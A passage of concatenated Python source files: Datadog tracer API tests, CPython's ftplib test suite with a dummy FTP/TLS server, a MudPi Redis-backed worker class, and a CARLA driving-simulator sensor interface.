t = threading.Thread(target=server.serve_forever)
# Set daemon just in case something fails
t.daemon = True
t.start()
return server, t
@pytest.fixture
def endpoint_uds_server(tmp_path):
server, thread = _make_uds_server(str(tmp_path / 'uds_server_socket'), _APIEndpointRequestHandlerTest)
try:
yield server
finally:
server.shutdown()
thread.join()
def _make_server(port, request_handler):
server = BaseHTTPServer.HTTPServer((_HOST, port), request_handler)
t = threading.Thread(target=server.serve_forever)
# Set daemon just in case something fails
t.daemon = True
t.start()
return server, t
@pytest.fixture(scope='module')
def endpoint_test_timeout_server():
server, thread = _make_server(_TIMEOUT_PORT, _TimeoutAPIEndpointRequestHandlerTest)
try:
yield thread
finally:
server.shutdown()
thread.join()
@pytest.fixture(scope='module')
def endpoint_test_reset_server():
server, thread = _make_server(_RESET_PORT, _ResetAPIEndpointRequestHandlerTest)
try:
yield thread
finally:
server.shutdown()
thread.join()
class ResponseMock:
def __init__(self, content, status=200):
self.status = status
self.content = content
def read(self):
return self.content
def test_api_str():
api = API('localhost', 8126, https=True)
assert str(api) == 'https://localhost:8126'
api = API('localhost', 8126, '/path/to/uds')
assert str(api) == 'unix:///path/to/uds'
class APITests(TestCase):
def setUp(self):
# DEV: Mock here instead of in tests, before we have patched `httplib.HTTPConnection`
self.conn = mock.MagicMock(spec=httplib.HTTPConnection)
self.api = API('localhost', 8126)
def tearDown(self):
del self.api
del self.conn
def test_typecast_port(self):
api = API('localhost', u'8126')
self.assertEqual(api.port, 8126)
@mock.patch('logging.Logger.debug')
def test_parse_response_json(self, log):
test_cases = {
'OK': dict(
js=None,
log='Cannot parse Datadog Agent response, please make sure your Datadog Agent is up to date',
),
'OK\n': dict(
js=None,
log='Cannot parse Datadog Agent response, please make sure your Datadog Agent is up to date',
),
'error:unsupported-endpoint': dict(
js=None,
log='Unable to parse Datadog Agent JSON response: .*? \'error:unsupported-endpoint\'',
),
42: dict( # int as key to trigger TypeError
js=None,
log='Unable to parse Datadog Agent JSON response: .*? 42',
),
'{}': dict(js={}),
'[]': dict(js=[]),
# Priority sampling "rate_by_service" response
('{"rate_by_service": '
'{"service:,env:":0.5, "service:mcnulty,env:test":0.9, "service:postgres,env:test":0.6}}'): dict(
js=dict(
rate_by_service={
'service:,env:': 0.5,
'service:mcnulty,env:test': 0.9,
'service:postgres,env:test': 0.6,
},
),
),
' [4,2,1] ': dict(js=[4, 2, 1]),
}
for k, v in iteritems(test_cases):
log.reset_mock()
r = Response.from_http_response(ResponseMock(k))
js = r.get_json()
assert v['js'] == js
if 'log' in v:
log.assert_called_once()
msg = log.call_args[0][0] % log.call_args[0][1:]
assert re.match(v['log'], msg), msg
@mock.patch('ddtrace.compat.httplib.HTTPConnection')
def test_put_connection_close(self, HTTPConnection):
"""
When calling API._put
we close the HTTPConnection we create
"""
HTTPConnection.return_value = self.conn
with warnings.catch_warnings(record=True) as w:
self.api._put('/test', '<test data>', 1)
self.assertEqual(len(w), 0, 'Test raised unexpected warnings: {0!r}'.format(w))
self.conn.request.assert_called_once()
self.conn.close.assert_called_once()
@mock.patch('ddtrace.compat.httplib.HTTPConnection')
def test_put_connection_close_exception(self, HTTPConnection):
"""
When calling API._put raises an exception
we close the HTTPConnection we create
"""
HTTPConnection.return_value = self.conn
# Ensure calling `request` raises an exception
self.conn.request.side_effect = Exception
with warnings.catch_warnings(record=True) as w:
with self.assertRaises(Exception):
self.api._put('/test', '<test data>', 1)
self.assertEqual(len(w), 0, 'Test raised unexpected warnings: {0!r}'.format(w))
self.conn.request.assert_called_once()
self.conn.close.assert_called_once()
def test_https():
conn = mock.MagicMock(spec=httplib.HTTPSConnection)
api = API('localhost', 8126, https=True)
with mock.patch('ddtrace.compat.httplib.HTTPSConnection') as HTTPSConnection:
HTTPSConnection.return_value = conn
api._put('/test', '<test data>', 1)
conn.request.assert_called_once()
conn.close.assert_called_once()
def test_flush_connection_timeout_connect():
payload = mock.Mock()
payload.get_payload.return_value = 'foobar'
payload.length = 12
api = API(_HOST, 2019)
response = api._flush(payload)
if PY3:
assert isinstance(response, (OSError, ConnectionRefusedError)) # noqa: F821
else:
assert isinstance(response, socket.error)
assert response.errno in (99, 111)
def test_flush_connection_timeout(endpoint_test_timeout_server):
payload = mock.Mock()
payload.get_payload.return_value = 'foobar'
payload.length = 12
api = API(_HOST, _TIMEOUT_PORT)
response = api._flush(payload)
assert isinstance(response, socket.timeout)
def test_flush_connection_reset(endpoint_test_reset_server):
payload = mock.Mock()
payload.get_payload.return_value = 'foobar'
payload.length = 12
api = API(_HOST, _RESET_PORT)
response = api._flush(payload)
if PY3:
assert isinstance(response, (httplib.BadStatusLine, ConnectionResetError)) # noqa: F821
else:
assert isinstance(response, httplib.BadStatusLine)
def test_flush_connection_uds(endpoint_uds_server):
payload = mock.Mock()
payload.get_payload.return_value = 'foobar'
payload.length = 12
api = API(_HOST, 2019, uds_path=endpoint_uds_server.server_address)
response = api._flush(payload)
assert response.status == 200
@mock.patch('ddtrace.internal.runtime.container.get_container_info')
def test_api_container_info(get_container_info):
# When we have container information
# DEV: `get_container_info` will return a `CGroupInfo` with a `container_id` or `None`
info = CGroupInfo(container_id='test-container-id')
get_container_info.return_value = info
api = API(_HOST, 8126)
assert api._container_info is info
assert api._headers['Datadog-Container-Id'] == 'test-container-id'
# When we do not have container information
get_container_info.return_value = None
api = API(_HOST, 8126)
assert api._container_info is None
assert 'Datadog-Container-Id' not in api._headers
|
test_ftplib.py
|
"""Test script for ftplib module."""
# Modified by Giampaolo Rodola' to test FTP class, IPv6 and TLS
# environment
import ftplib
import asyncore
import asynchat
import socket
import StringIO
import errno
import os
try:
import ssl
except ImportError:
ssl = None
from unittest import TestCase
from test import test_support
from test.test_support import HOST
threading = test_support.import_module('threading')
# the dummy data returned by server over the data channel when
# RETR, LIST and NLST commands are issued
RETR_DATA = 'abcde12345\r\n' * 1000
LIST_DATA = 'foo\r\nbar\r\n'
NLST_DATA = 'foo\r\nbar\r\n'
class DummyDTPHandler(asynchat.async_chat):
dtp_conn_closed = False
def __init__(self, conn, baseclass):
asynchat.async_chat.__init__(self, conn)
self.baseclass = baseclass
self.baseclass.last_received_data = ''
def handle_read(self):
self.baseclass.last_received_data += self.recv(1024)
def handle_close(self):
# XXX: this method can be called many times in a row for a single
# connection, including in clear-text (non-TLS) mode.
# (behaviour witnessed with test_data_connection)
if not self.dtp_conn_closed:
self.baseclass.push('226 transfer complete')
self.close()
self.dtp_conn_closed = True
def handle_error(self):
raise
class DummyFTPHandler(asynchat.async_chat):
dtp_handler = DummyDTPHandler
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.set_terminator("\r\n")
self.in_buffer = []
self.dtp = None
self.last_received_cmd = None
self.last_received_data = ''
self.next_response = ''
self.rest = None
self.push('220 welcome')
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = ''.join(self.in_buffer)
self.in_buffer = []
if self.next_response:
self.push(self.next_response)
self.next_response = ''
cmd = line.split(' ')[0].lower()
self.last_received_cmd = cmd
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('550 command "%s" not understood.' %cmd)
def handle_error(self):
raise
def push(self, data):
asynchat.async_chat.push(self, data + '\r\n')
def cmd_port(self, arg):
addr = map(int, arg.split(','))
ip = '%d.%d.%d.%d' %tuple(addr[:4])
port = (addr[4] * 256) + addr[5]
s = socket.create_connection((ip, port), timeout=10)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_pasv(self, arg):
sock = socket.socket()
sock.bind((self.socket.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(10)
ip, port = sock.getsockname()[:2]
ip = ip.replace('.', ',')
p1, p2 = divmod(port, 256)
self.push('227 entering passive mode (%s,%d,%d)' %(ip, p1, p2))
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_eprt(self, arg):
af, ip, port = arg.split(arg[0])[1:-1]
port = int(port)
s = socket.create_connection((ip, port), timeout=10)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_epsv(self, arg):
sock = socket.socket(socket.AF_INET6)
sock.bind((self.socket.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(10)
port = sock.getsockname()[1]
self.push('229 entering extended passive mode (|||%d|)' %port)
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_user(self, arg):
self.push('331 username ok')
def cmd_pass(self, arg):
self.push('230 password ok')
def cmd_acct(self, arg):
self.push('230 acct ok')
def cmd_rnfr(self, arg):
self.push('350 rnfr ok')
def cmd_rnto(self, arg):
self.push('250 rnto ok')
def cmd_dele(self, arg):
self.push('250 dele ok')
def cmd_cwd(self, arg):
self.push('250 cwd ok')
def cmd_size(self, arg):
self.push('250 1000')
def cmd_mkd(self, arg):
self.push('257 "%s"' %arg)
def cmd_rmd(self, arg):
self.push('250 rmd ok')
def cmd_pwd(self, arg):
self.push('257 "pwd ok"')
def cmd_type(self, arg):
self.push('200 type ok')
def cmd_quit(self, arg):
self.push('221 quit ok')
self.close()
def cmd_stor(self, arg):
self.push('125 stor ok')
def cmd_rest(self, arg):
self.rest = arg
self.push('350 rest ok')
def cmd_retr(self, arg):
self.push('125 retr ok')
if self.rest is not None:
offset = int(self.rest)
else:
offset = 0
self.dtp.push(RETR_DATA[offset:])
self.dtp.close_when_done()
self.rest = None
def cmd_list(self, arg):
self.push('125 list ok')
self.dtp.push(LIST_DATA)
self.dtp.close_when_done()
def cmd_nlst(self, arg):
self.push('125 nlst ok')
self.dtp.push(NLST_DATA)
self.dtp.close_when_done()
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
handler = DummyFTPHandler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accept(self):
conn, addr = self.accept()
self.handler = self.handler(conn)
self.close()
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise
if ssl is not None:
CERTFILE = os.path.join(os.path.dirname(__file__), "keycert.pem")
class SSLConnection(object, asyncore.dispatcher):
"""An asyncore.dispatcher subclass supporting TLS/SSL."""
_ssl_accepting = False
_ssl_closing = False
def secure_connection(self):
self.socket = ssl.wrap_socket(self.socket, suppress_ragged_eofs=False,
certfile=CERTFILE, server_side=True,
do_handshake_on_connect=False,
ssl_version=ssl.PROTOCOL_SSLv23)
self._ssl_accepting = True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError, err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except socket.error, err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def _do_ssl_shutdown(self):
self._ssl_closing = True
try:
self.socket = self.socket.unwrap()
except ssl.SSLError, err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
except socket.error, err:
# Any "socket error" corresponds to a SSL_ERROR_SYSCALL return
# from OpenSSL's SSL_shutdown(), corresponding to a
# closed socket condition. See also:
# http://www.mail-archive.com/openssl-users@openssl.org/msg60710.html
pass
self._ssl_closing = False
super(SSLConnection, self).close()
def handle_read_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_read_event()
def handle_write_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_write_event()
def send(self, data):
try:
return super(SSLConnection, self).send(data)
except ssl.SSLError, err:
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN,
ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return 0
raise
def recv(self, buffer_size):
try:
return super(SSLConnection, self).recv(buffer_size)
except ssl.SSLError, err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return ''
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN):
self.handle_close()
return ''
raise
def handle_error(self):
raise
def close(self):
if (isinstance(self.socket, ssl.SSLSocket) and
self.socket._sslobj is not None):
self._do_ssl_shutdown()
class DummyTLS_DTPHandler(SSLConnection, DummyDTPHandler):
"""A DummyDTPHandler subclass supporting TLS/SSL."""
def __init__(self, conn, baseclass):
DummyDTPHandler.__init__(self, conn, baseclass)
if self.baseclass.secure_data_channel:
self.secure_connection()
class DummyTLS_FTPHandler(SSLConnection, DummyFTPHandler):
"""A DummyFTPHandler subclass supporting TLS/SSL."""
dtp_handler = DummyTLS_DTPHandler
def __init__(self, conn):
DummyFTPHandler.__init__(self, conn)
self.secure_data_channel = False
def cmd_auth(self, line):
"""Set up secure control channel."""
self.push('234 AUTH TLS successful')
self.secure_connection()
def cmd_pbsz(self, line):
"""Negotiate size of buffer for secure data transfer.
For TLS/SSL the only valid value for the parameter is '0'.
Any other value is accepted but ignored.
"""
self.push('200 PBSZ=0 successful.')
def cmd_prot(self, line):
"""Setup un/secure data channel."""
arg = line.upper()
if arg == 'C':
self.push('200 Protection set to Clear')
self.secure_data_channel = False
elif arg == 'P':
self.push('200 Protection set to Private')
self.secure_data_channel = True
else:
self.push("502 Unrecognized PROT type (use C or P).")
class DummyTLS_FTPServer(DummyFTPServer):
handler = DummyTLS_FTPHandler
class TestFTPClass(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP(timeout=10)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(), '220 welcome')
def test_sanitize(self):
self.assertEqual(self.client.sanitize('foo'), repr('foo'))
self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****'))
self.assertEqual(self.client.sanitize('PASS 12345'), repr('PASS *****'))
def test_exceptions(self):
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')
def test_all_errors(self):
exceptions = (ftplib.error_reply, ftplib.error_temp, ftplib.error_perm,
ftplib.error_proto, ftplib.Error, IOError, EOFError)
for x in exceptions:
try:
raise x('exception not included in all_errors set')
except ftplib.all_errors:
pass
def test_set_pasv(self):
# passive mode is supposed to be enabled by default
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(True)
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(False)
self.assertFalse(self.client.passiveserver)
def test_voidcmd(self):
self.client.voidcmd('echo 200')
self.client.voidcmd('echo 299')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')
def test_login(self):
self.client.login()
def test_acct(self):
self.client.acct('passwd')
def test_rename(self):
self.client.rename('a', 'b')
self.server.handler.next_response = '200'
self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')
def test_delete(self):
self.client.delete('foo')
self.server.handler.next_response = '199'
self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')
def test_size(self):
self.client.size('foo')
def test_mkd(self):
dir = self.client.mkd('/foo')
self.assertEqual(dir, '/foo')
def test_rmd(self):
self.client.rmd('foo')
def test_pwd(self):
dir = self.client.pwd()
self.assertEqual(dir, 'pwd ok')
def test_quit(self):
self.assertEqual(self.client.quit(), '221 quit ok')
# Ensure the connection gets closed; sock attribute should be None
self.assertEqual(self.client.sock, None)
def test_retrbinary(self):
received = []
self.client.retrbinary('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA)
def test_retrbinary_rest(self):
for rest in (0, 10, 20):
received = []
self.client.retrbinary('retr', received.append, rest=rest)
self.assertEqual(''.join(received), RETR_DATA[rest:],
msg='rest test case %d %d %d' % (rest,
len(''.join(received)),
len(RETR_DATA[rest:])))
def test_retrlines(self):
received = []
self.client.retrlines('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA.replace('\r\n', ''))
def test_storbinary(self):
f = StringIO.StringIO(RETR_DATA)
self.client.storbinary('stor', f)
self.assertEqual(self.server.handler.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_storbinary_rest(self):
f = StringIO.StringIO(RETR_DATA)
for r in (30, '30'):
f.seek(0)
self.client.storbinary('stor', f, rest=r)
self.assertEqual(self.server.handler.rest, str(r))
def test_storlines(self):
f = StringIO.StringIO(RETR_DATA.replace('\r\n', '\n'))
self.client.storlines('stor', f)
self.assertEqual(self.server.handler.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storlines('stor foo', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_nlst(self):
self.client.nlst()
self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])
def test_dir(self):
l = []
self.client.dir(lambda x: l.append(x))
self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))
def test_makeport(self):
self.client.makeport()
# IPv4 is in use, just make sure send_eprt has not been used
self.assertEqual(self.server.handler.last_received_cmd, 'port')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), 10)
conn.close()
# IPv4 is in use, just make sure send_epsv has not been used
self.assertEqual(self.server.handler.last_received_cmd, 'pasv')
class TestIPv6Environment(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0), af=socket.AF_INET6)
self.server.start()
self.client = ftplib.FTP()
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_af(self):
self.assertEqual(self.client.af, socket.AF_INET6)
def test_makeport(self):
self.client.makeport()
self.assertEqual(self.server.handler.last_received_cmd, 'eprt')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), 10)
conn.close()
self.assertEqual(self.server.handler.last_received_cmd, 'epsv')
def test_transfer(self):
def retr():
received = []
self.client.retrbinary('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA)
self.client.set_pasv(True)
retr()
self.client.set_pasv(False)
retr()
class TestTLS_FTPClassMixin(TestFTPClass):
"""Repeat TestFTPClass tests starting the TLS layer for both control
and data connections first.
"""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=10)
self.client.connect(self.server.host, self.server.port)
# enable TLS
self.client.auth()
self.client.prot_p()
class TestTLS_FTPClass(TestCase):
"""Specific TLS_FTP class tests."""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=10)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_control_connection(self):
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
def test_data_connection(self):
# clear text
sock = self.client.transfercmd('list')
self.assertNotIsInstance(sock, ssl.SSLSocket)
sock.close()
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# secured, after PROT P
self.client.prot_p()
sock = self.client.transfercmd('list')
self.assertIsInstance(sock, ssl.SSLSocket)
sock.close()
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# PROT C is issued, the connection must be in cleartext again
self.client.prot_c()
sock = self.client.transfercmd('list')
self.assertNotIsInstance(sock, ssl.SSLSocket)
sock.close()
self.assertEqual(self.client.voidresp(), "226 transfer complete")
def test_login(self):
# login() is supposed to implicitly secure the control connection
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.login()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
# make sure that AUTH TLS doesn't get issued again
self.client.login()
def test_auth_issued_twice(self):
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
def test_auth_ssl(self):
try:
self.client.ssl_version = ssl.PROTOCOL_SSLv3
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
finally:
self.client.ssl_version = ssl.PROTOCOL_TLSv1
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(3)
self.port = test_support.bind_port(self.sock)
threading.Thread(target=self.server, args=(self.evt,self.sock)).start()
# Wait for the server to be ready.
self.evt.wait()
self.evt.clear()
ftplib.FTP.port = self.port
def tearDown(self):
self.evt.wait()
def server(self, evt, serv):
# This method sets the evt 3 times:
# 1) when the connection is ready to be accepted.
# 2) when it is safe for the caller to close the connection
# 3) when we have closed the socket
serv.listen(5)
# (1) Signal the caller that we are ready to accept the connection.
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
conn.send("1 Hola mundo\n")
# (2) Signal the caller that it is safe to close the socket.
evt.set()
conn.close()
finally:
serv.close()
# (3) Signal the caller that we are done.
evt.set()
def testTimeoutDefault(self):
# default -- use global socket timeout
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP("localhost")
finally:
socket.setdefaulttimeout(None)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutNone(self):
# no timeout -- do not use global socket timeout
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP("localhost", timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(ftp.sock.gettimeout() is None)
self.evt.wait()
ftp.close()
def testTimeoutValue(self):
# a value
ftp = ftplib.FTP(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutConnect(self):
ftp = ftplib.FTP()
ftp.connect(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDifferentOrder(self):
ftp = ftplib.FTP(timeout=30)
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDirectAccess(self):
ftp = ftplib.FTP()
ftp.timeout = 30
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def test_main():
tests = [TestFTPClass, TestTimeouts]
if socket.has_ipv6:
try:
DummyFTPServer((HOST, 0), af=socket.AF_INET6)
except socket.error:
pass
else:
tests.append(TestIPv6Environment)
if ssl is not None:
tests.extend([TestTLS_FTPClassMixin, TestTLS_FTPClass])
thread_info = test_support.threading_setup()
try:
test_support.run_unittest(*tests)
finally:
test_support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
worker.py
|
import time
import datetime
import json
import redis
import threading
import sys
sys.path.append('..')
import variables
from logger.Logger import Logger, LOG_LEVEL
def log(func):
def wrapper(*args, **kwargs):
print("MudPi Debug Log: " + " ".join([str(arg) for arg in args]) + " at " + str(datetime.datetime.now()))
value = func(*args, **kwargs)
return value
# Base Worker Class
# A worker is responsible for handling its set of operations and running on a thread
class Worker():
def __init__(self, config, main_thread_running, system_ready):
self.config = config
try:
self.r = config["redis"]
except KeyError:
self.r = redis.Redis(host='127.0.0.1', port=6379)
self.topic = config.get('topic', 'mudpi').replace(" ", "_").lower()
self.sleep_duration = config.get('sleep_duration', 15)
# Threading Events to Keep Everything in Sync
self.main_thread_running = main_thread_running
self.system_ready = system_ready
self.worker_available = threading.Event()
self.components = []
return
def init(self):
# print('Worker...\t\t\t\033[1;32m Initializing\033[0;0m'.format(**control))
return
def run(self):
t = threading.Thread(target=self.work, args=())
t.start()
return t
def work(self):
while self.main_thread_running.is_set():
if self.system_ready.is_set():
time.sleep(self.sleep_duration)
#This is only ran after the main thread is shut down
Logger.log(LOG_LEVEL["info"], "Worker Shutting Down...\t\033[1;32m Complete\033[0;0m")
def elapsedTime(self):
self.time_elapsed = time.perf_counter() - self.time_start
return self.time_elapsed
def resetElapsedTime(self):
self.time_start = time.perf_counter()
pass
def dynamic_import(self, name):
# Split path of the class folder structure: {sensor name}_sensor . {SensorName}Sensor
components = name.split('.')
# Dynamically import root of component path
module = __import__(components[0])
# Get component attributes
for component in components[1:]:
module = getattr(module, component)
return module
def decodeMessageData(self, message):
if isinstance(message, dict):
#print('Dict Found')
return message
elif isinstance(message.decode('utf-8'), str):
try:
temp = json.loads(message.decode('utf-8'))
#print('Json Found')
return temp
except:
#print('Json Error. Str Found')
return {'event':'Unknown', 'data':message}
else:
#print('Failed to detect type')
return {'event':'Unknown', 'data':message}
|
sensor_interface.py
|
import copy
import logging
import numpy as np
import os
import time
from threading import Thread
import carla
def threaded(fn):
def wrapper(*args, **kwargs):
thread = Thread(target=fn, args=args, kwargs=kwargs)
thread.setDaemon(True)
thread.start()
return thread
return wrapper
class HDMapMeasurement(object):
def __init__(self, data, frame_number):
self.data = data
self.frame_number = frame_number
class HDMapReader(object):
def __init__(self, vehicle, reading_frequency=1.0):
self._vehicle = vehicle
self._reading_frequency = reading_frequency
self._CARLA_ROOT = os.getenv('CARLA_ROOT', "./")
self._callback = None
self._frame_number = 0
self._run_ps = True
self.run()
def __call__(self):
map_name = os.path.basename(self._vehicle.get_world().get_map().name)
transform = self._vehicle.get_transform()
return {'map_file': "{}/HDMaps/{}.ply".format(self._CARLA_ROOT, map_name),
'transform': {'x': transform.location.x,
'y': transform.location.y,
'z': transform.location.z,
'yaw': transform.rotation.yaw,
'pitch': transform.rotation.pitch,
'roll': transform.rotation.roll}
}
@threaded
def run(self):
latest_read = time.time()
while self._run_ps:
if self._callback is not None:
capture = time.time()
if capture - latest_read > (1 / self._reading_frequency):
self._callback(HDMapMeasurement(self.__call__(), self._frame_number))
self._frame_number += 1
latest_read = time.time()
else:
time.sleep(0.001)
def listen(self, callback):
# Tell that this function receives what the producer does.
self._callback = callback
def destroy(self):
self._run_ps = False
class SpeedMeasurement(object):
def __init__(self, data, frame_number):
self.data = data
self.frame_number = frame_number
class Speedometer(object):
"""
Speed pseudo sensor that gets the current speed of the vehicle.
This sensor is not placed at the CARLA environment. It is
only an asynchronous interface to the forward speed.
"""
def __init__(self, vehicle, reading_frequency):
# The vehicle where the class reads the speed
self._vehicle = vehicle
# How often do you look at your speedometer in hz
self._reading_frequency = reading_frequency
self._callback = None
# Counts the frames
self._frame_number = 0
self._run_ps = True
self.produce_speed()
def _get_forward_speed(self):
""" Convert the vehicle transform directly to forward speed """
velocity = self._vehicle.get_velocity()
transform = self._vehicle.get_transform()
vel_np = np.array([velocity.x, velocity.y, velocity.z])
pitch = np.deg2rad(transform.rotation.pitch)
yaw = np.deg2rad(transform.rotation.yaw)
orientation = np.array([np.cos(pitch) * np.cos(yaw), np.cos(pitch) * np.sin(yaw), np.sin(pitch)])
speed = np.dot(vel_np, orientation)
return speed
@threaded
def produce_speed(self):
latest_speed_read = time.time()
while self._run_ps:
if self._callback is not None:
capture = time.time()
if capture - latest_speed_read > (1 / self._reading_frequency):
self._callback(SpeedMeasurement(self._get_forward_speed(), self._frame_number))
self._frame_number += 1
latest_speed_read = time.time()
else:
time.sleep(0.001)
def listen(self, callback):
# Tell that this function receives what the producer does.
self._callback = callback
def destroy(self):
self._run_ps = False
class CallBack(object):
def __init__(self, tag, sensor, data_provider):
self._tag = tag
self._data_provider = data_provider
self._data_provider.register_sensor(tag, sensor)
def __call__(self, data):
if isinstance(data, carla.Image):
self._parse_image_cb(data, self._tag)
elif isinstance(data, carla.LidarMeasurement):
self._parse_lidar_cb(data, self._tag)
elif isinstance(data, carla.GnssEvent):
self._parse_gnss_cb(data, self._tag)
elif isinstance(data, SpeedMeasurement):
self._parse_speedometer(data, self._tag)
elif isinstance(data, HDMapMeasurement):
self._parse_hdmap(data, self._tag)
else:
logging.error('No callback method for this sensor.')
def _parse_image_cb(self, image, tag):
array = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
array = copy.deepcopy(array)
array = np.reshape(array, (image.height, image.width, 4))
array = array[:, :, :3]
array = array[:, :, ::-1]
self._data_provider.update_sensor(tag, array, image.frame_number)
def _parse_lidar_cb(self, lidar_data, tag):
points = np.frombuffer(lidar_data.raw_data, dtype=np.dtype('f4'))
points = copy.deepcopy(points)
points = np.reshape(points, (int(points.shape[0] / 3), 3))
self._data_provider.update_sensor(tag, points, lidar_data.frame_number)
def _parse_gnss_cb(self, gnss_data, tag):
array = np.array([gnss_data.latitude,
gnss_data.longitude,
gnss_data.altitude], dtype=np.float32)
self._data_provider.update_sensor(tag, array, gnss_data.frame_number)
def _parse_speedometer(self, speed, tag):
self._data_provider.update_sensor(tag, speed.data, speed.frame_number)
def _parse_hdmap(self, hd_package, tag):
